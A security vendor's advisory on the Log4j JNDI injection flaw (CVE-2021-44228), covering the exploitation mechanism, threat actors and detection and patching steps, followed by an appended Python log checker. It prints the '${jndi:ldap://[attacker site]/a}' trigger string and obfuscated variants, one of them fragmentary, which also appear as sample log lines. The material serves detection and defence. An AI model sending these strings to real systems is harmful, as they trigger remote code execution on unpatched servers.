Update: Managing the Log4j Vulnerability
Silent Breach Labs
To help companies detect and mitigate the Log4j vulnerability, Silent Breach is offering a free advisory service. Contact us to learn more.
Overview
The Log4j vulnerability (CVE-2021-44228) is a Java Naming and Directory Interface (JNDI) injection vulnerability that affects Apache Log4j versions 2.0 to 2.14.1. It was first made public by security researchers on December 9, 2021 and, because of its ease of exploitation and its prevalence across enterprise applications, is considered one of the most severe software flaws identified in decades.
While it remains difficult to determine the full extent of the compromise, nearly a third of all web servers in the world employ the vulnerable code. These include popular enterprise and consumer technologies such as Twitter, Amazon, Microsoft, Apple, IBM, Oracle, Cisco, Google, and Minecraft. U.S. officials estimate that hundreds of millions of devices have been exposed and that more than 4,000,000 hacking attempts have been made to date, nearly half of which were conducted by malicious groups.
As many Java-based systems incorporate Log4j, organizations are strongly encouraged to contact all relevant vendors to confirm that the latest patched version is in use. A list of affected enterprise software is being maintained by the Cybersecurity and Infrastructure Security Agency (CISA) and runs to over 500 items at the time of writing.
Exploitation
CVE-2021-44228 allows unauthenticated remote code execution and is triggered when a specially crafted lookup string is logged and expanded by the vulnerable Log4j component. An example attack string looks like this:
${jndi:ldap://[attacker site]/a}
However, as security teams work to detect ongoing exploitation, attackers are adding obfuscation layers to the attack string to evade detection. One observed pattern assembles the jndi keyword from nested lower or upper lookups, or from Log4j's default-value syntax, inside the string:
{jndi:${lower:l}${lower:d}a${lower:p}
${${::-j}${::-n}${::-d}${::-i}
In this way, an attacker sends an HTTP request to a target system, and the request contents are written to a log by Log4j 2. Log4j expands the lookup and uses JNDI to make a request to the attacker-controlled site, and the exploited process then retrieves and executes the payload that site returns. In many observed attacks, the attacker-controlled endpoint is a DNS logging service, intended only to record the callback and fingerprint vulnerable systems.
Malicious Actors
While the vast majority of detected activity comes from mass scanning by both attackers and security researchers, a number of key malicious actors have been identified as leveraging the Log4j vulnerability. In particular, Silent Breach Labs has observed nation-state actors from China, Turkey, Iran, and North Korea exploiting the Log4j vulnerability. Activities range from experimentation and development to integration into in-the-wild payload deployments.
Unsurprisingly, HAFNIUM, the Chinese group behind the 2021 Microsoft breach, has already operationalized the vulnerability to attack virtualization infrastructure, extending its usual targeting. More specifically, HAFNIUM actors were observed using a DNS service that performs system fingerprinting for testing purposes.
Moreover, a number of access brokers (groups that sell illegitimate access to the highest bidder) have begun to leverage CVE-2021-44228. As these breaches make their way into the hands of ransomware-as-a-service affiliates, we can expect a wave of ransomware attacks around the globe, particularly around the holidays.
Detection and Mitigation
Use CISA's GitHub repository as well as CERT/CC's CVE-2021-44228_scanner to determine whether your organization is vulnerable. If necessary, engage a Managed Security Service Provider to review your exposure.
Review Apache's Log4j Security Vulnerabilities page for additional information and, if appropriate, apply the available patches immediately. Begin by patching mission-critical systems, internet-facing systems, and networked servers before moving on to other affected technology assets.
Perform a security review to determine whether any compromise took place. The log files of any service using an affected Log4j version will contain the user-controlled strings that were logged, so search them for JNDI lookup patterns, including the obfuscated variants described above.
Consider reporting compromises immediately to CISA and the FBI.
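As an added example that is not part of this advisory, the following Python checker applies the log-review step above to the obfuscation patterns from the Exploitation section: it collapses nested lower/upper and default-value lookups from the inside out, then flags any line that resolves to a JNDI lookup. The log lines are constructed samples, and the [attacker site] placeholder is the one used above.

```python
import re
# Constructed sample log lines (not from the advisory): a benign request, the plain
# lookup string from the text, and the two obfuscated variants the text describes.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://[attacker site]/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://[attacker site]/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:ldap://[attacker site]/a}"',
]
INNERMOST = re.compile(r'\$\{([^${}]*)\}')   # a ${...} with nothing nested inside it
NESTED = re.compile(r'\$\{[^}]*\$\{')         # a lookup nested inside another lookup
JNDI = re.compile(r'\$\{\s*jndi:', re.IGNORECASE)

def reduce_lookup(body):
    """Evaluate one innermost lookup the way the obfuscation relies on Log4j doing;
    None means leave it in place (jndi, env and anything else not evaluated here)."""
    kind, _, arg = body.partition(':')
    if kind.lower() == 'lower':
        return arg.lower()
    if kind.lower() == 'upper':
        return arg.upper()
    if ':-' in body:   # ${name:-default}: an unresolvable name yields the default
        return body.split(':-', 1)[1]
    return None

def normalize(text, max_rounds=20):
    """Collapse nested lookups from the inside out until nothing changes."""
    def step(match):
        replacement = reduce_lookup(match.group(1))
        return match.group(0) if replacement is None else replacement
    for _ in range(max_rounds):
        reduced = INNERMOST.sub(step, text)
        if reduced == text:
            break
        text = reduced
    return text

def scan_line(line):
    """Return (verdict, normalized_line); verdict is None when nothing looks suspicious."""
    resolved = normalize(line)
    if JNDI.search(resolved):
        return 'jndi-lookup', resolved
    if NESTED.search(line):
        return 'nested-lookup', resolved   # unresolved nesting still deserves a look
    return None, resolved

def scan_logs(lines):
    """Return [(line_number, verdict, normalized_line)] for every suspicious line."""
    return [(n, v, r) for n, line in enumerate(lines, 1) for v, r in [scan_line(line)] if v]
```

Run it line by line over real access or application logs; a nested-lookup verdict means the string did not resolve to jndi here but still carries lookup syntax that no legitimate client would send.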
How We Can Help
Silent Breach can help conduct an immediate triage as well as a full audit of your infrastructure to determine whether any malicious activity took place and, if so, how you should respond. Our security team is fully briefed on CVE-2021-44228 and Quantum Armor has been updated to detect the latest IOCs and alert users to any suspicious activity.
In the event that malicious activity is identified on your network, our forensics team will carefully capture and preserve that evidence for further analysis and legal processes. In either case, a full report detailing steps taken, discoveries made, and recommended mitigation steps (both short-term quick wins and a long-term roadmap) will be compiled for internal guidance as well as external stakeholder reassurance.
For more detailed descriptions of Silent Breach's Incident Response programs, please see our Incident Response and Managed Response pages. Or, for more information on how your organization may be impacted by the Log4j vulnerability or for additional guidance, please contact Silent Breach at contact@silentbreach.com.
About Silent Breach: Silent Breach is an award-winning provider of cyber security services. Our global team provides cutting-edge insights and expertise across the Data Center, Enterprise, SME, Retail, Government, Finance, Education, Automotive, Hospitality, Healthcare and IoT industries.